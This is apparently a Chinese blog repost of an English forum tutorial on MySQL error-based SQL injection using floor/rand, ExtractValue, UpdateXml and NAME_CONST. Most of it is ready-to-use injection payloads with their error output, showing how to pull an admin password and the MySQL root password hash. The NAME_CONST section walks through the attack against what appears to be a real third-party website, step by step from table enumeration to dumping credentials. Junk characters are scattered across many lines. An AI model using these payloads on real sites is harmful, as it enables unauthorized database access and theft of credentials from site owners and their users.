mysql ,floor,ExtractValue,UpdateXml三种报错模式注入利用方法

admin

1、通过floor报错

可以通过如下一些利用代码

and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

and (select count(*) from (select 1 union   select null union   select  !1)x group by concat((select table_name from information_schema.tables  limit 1),floor(rand(0)*2)));

举例如下：
首先进行正常查询：

mysql> select * from article where id = 1;
2 H2 D8 A1 W' ]$ s8 o. u+—-+——-+———+
* r9 r) Y/ w) D- ^| id | title | content |
9 f! ]% y1 g' i+—-+——-+———+
|  1 | test  | do it   |
+—-+——-+———+

假如id输入存在注入的话，可以通过如下语句进行报错。

mysql> select * from article where id = 1 and (select 1 from  (select count(*),concat(version(),floor(rand(0)*2))x from  information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry ’5.1.33-community-log1′ for key ’group_key’

可以看到成功爆出了Mysql的版本，如果需要查询其他数据，可以通过修改version()所在位置语句进行查询。
7 r( p) ?) }# J  k6 ^& S) c6 ?9 ~/ V例如我们需要查询管理员用户名和密码：

Method1:

mysql> select * from article where id = 1 and (select 1 from  (select count(*),concat((select pass from admin where id  =1),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’

Method2:

mysql> select * from article where id = 1 and (select count(*)  from (select 1 union   select null union   select !1)x group by  concat((select pass from admin limit 1),floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’

2、ExtractValue
测试语句如下

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

实际测试过程

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));–
, c4 G/ x! K1 L+ E/ wERROR 1105 (HY000): XPATH syntax error: ’\admin888′

3、UpdateXml

测试语句

and 1=(updatexml(1,concat(0x3a,(select user())),1))

实际测试过程

mysql> select * from article where id = 1 and 1=(updatexml(0x3a,concat(1,(select user())),1))ERROR 1105 (HY000): XPATH syntax error: ’:root@localhost’

  t" E: p/ s" o' A1 c) J

再收集：

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)
2 W9 q2 s' A& _& d. v5 X
' m9 P* t8 Q& Z0 I7 B; T1 J; {Erroruplicate column name ‘5.0.27-community-nt’Erroruplicate column name ‘5.0.27-community-nt’

% p; T( z, Y, W8 i+ ?http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)

Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′
; L0 }" x& J2 i8 a6 p
6 Z& g0 D$ K. h4 z- z* x, J2 o, RMYSQL高版本报错注入技巧-利用NAME_CONST注入
4 [% P& ]& l" _It's been a while since I've made an SQL Injection tutorial, so I'd thought I should make a new tutorial using the method name_const. There's not many papers documenting this method, so it feels kind of good to be the one to make a guide for it.
  D' B) j6 \' O* t' ?, p6 @- J
) k' s- h5 f1 k3 C, I! T
相关信息
  a, c- U: H1 V: y. S) Z, i
NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.

6 y' Y: F) b( A/ C2 @; H5 C" ]Code:
% m6 _5 v4 A8 ^9 }, R2 f5 ONAME_CONST(DATA, VALUE)

1 I" V) d  q8 h3 _1 E1 m, z, \Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.
+ ]' b, n; U* t, S- E
- y. A& M  a8 A' H- i+ [& cSELECT NAME_CONST('TEST', 1)

# K- O1 D; h$ Y( O
. A- r' O& R5 D- o& ]1 ]5 {6 M* E
|---------------|
# f8 G# d6 i/ t) V( \& @! O|     TEST      |
|               |
9 _) X" G  J% X/ f, q* U|---------------|
|       1       |
$ e& s, U% T: W* |! z# z. ^|               |
|---------------|
2 q+ I4 b0 H! f) o



http://dev.mysql.com/doc/refman/5.0/en/m...name-const
  H; \. P; f5 T* ^Intro to MySQL Variables

Once you've got your vulnerable site, lets try getting some MySQL system variables using NAME_CONST.

: V4 W* H& Z2 z3 ^* f* yCode:
% D; J, ?* j* V* x; m! L* f, @http://www.baido.hk/qcwh/content ... ;sid=19&cid=261
' Z6 m- e% \1 q+ p; h& Z0 V7 B
% ?5 j" V  P- e. `
' K' _) J" P8 W+ F* P! o

3 y8 o$ [) f9 ^( g" {* e
( d$ s7 w% _% n; W+ fCode:
' D/ N9 n* v9 C9 I. I+ z* J# wand+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--


! {$ b6 c/ e0 y5 _VAR = Your MySQL variable.

MySQL 5.1.3 Server System Variables
: F8 U8 U! f* J( X0 Z. f1 N! {# T
- O! C' `. C# k( M, xLet's try it out on my site..

3 D8 i/ A8 }+ eCode:
$ [. @3 U( S' z5 h' ?4 dhttp://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--
( z" I! N: H% H! o
+ f- M& M7 K& T0 N2 n8 q# z' YErroruplicate column name '5.0.27-community-nt'



( S' }" G7 d$ V: r# a# W; `
0 d% H7 w9 Q8 i) y
4 \( A8 [  W! p' g0 N1 l, \" fNow I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, just wouldn't work there. Luckily, they work here so let's get this going again...

9 e: c4 Y/ }/ L. GData Extraction

: K4 c: L2 F4 ?: f8 N( p4 ZCode:
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--
! t1 y9 Q$ @. M% x. }" N

: D1 p  }( e3 @# w# ]We should get a duplicate column 1 error...

: ^+ W- g: x; g: X* h$ Z8 C! O! cCode:
8 d3 c( ^8 M8 b( z8 U7 q* Q7 P$ ahttp://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--

! K2 V7 P+ A" b3 J8 W- W% YErroruplicate column name '1
8 ]6 m* w0 `5 p
5 `( R; h" W/ X/ X/ G" l) s8 ~
; v) [7 g' ^1 x2 a) c



( F! x" l; p- E* k5 ENow let's get the tables out this bitch..
$ g/ J* n0 R" ]6 f! @
Code:
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--
3 W' J, m$ H* d3 t3 h
3 A  n. j; v2 ~8 Q3 \! Z
; |: L3 t! M- ?7 JLet's see if it works here, if it does, we can go on and finish the job.

Code:
: [4 A! x, ~/ H7 A+ Y4 R- jhttp://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--
. {/ v( f4 v+ J1 X# K5 m

5 e" L% ~6 f+ VErroruplicate column name 'com_admanage
0 u0 v- ], g, V# j* _* ~



7 U$ l, k0 e$ M( f! P

  f# p$ d0 }1 V9 n% }( fNow I'm going to be lazy and use mysql.user as an example, just for the sake of time.
3 _3 \* L. r# l% Y8 C6 i- [
Let's get the columns out of the user table..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--
2 g! |: @: |. ^' g& o1 W
% N% v$ F6 r8 k2 u: Z: z
% L, E7 P0 @7 f' R$ @9 ~So mine looks like this, and I get the duplicate column name 'Host'.
6 o/ h) J; s, j8 u$ o$ @) U) Q! Z
, ^# J4 Z) W. z! ]" |. s7 L8 FCode:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--
; O, \, }9 l, o) P
6 O( ~% E& _5 Z& y  z$ cErroruplicate column name 'Host'
8 m+ }* I& E3 x& D





, `8 @1 A/ d1 v- kWoot, time to finish this bitch off.

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--
, Z+ l9 x3 E. U( {" _9 @

7 l% ?3 B2 P+ BSo mine looks like this...
" I2 k9 C  x8 l9 o; T/ D( J
Code:
http://www.baido.hk /qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--

& m( j, B2 w1 B, |" }+ m$ ^Erroruplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'

7 {+ F& Z! P- k1 G+ n& ~" y* x


( W+ I( I3 q4 I3 e$ i

And there we have it, thanks for reading.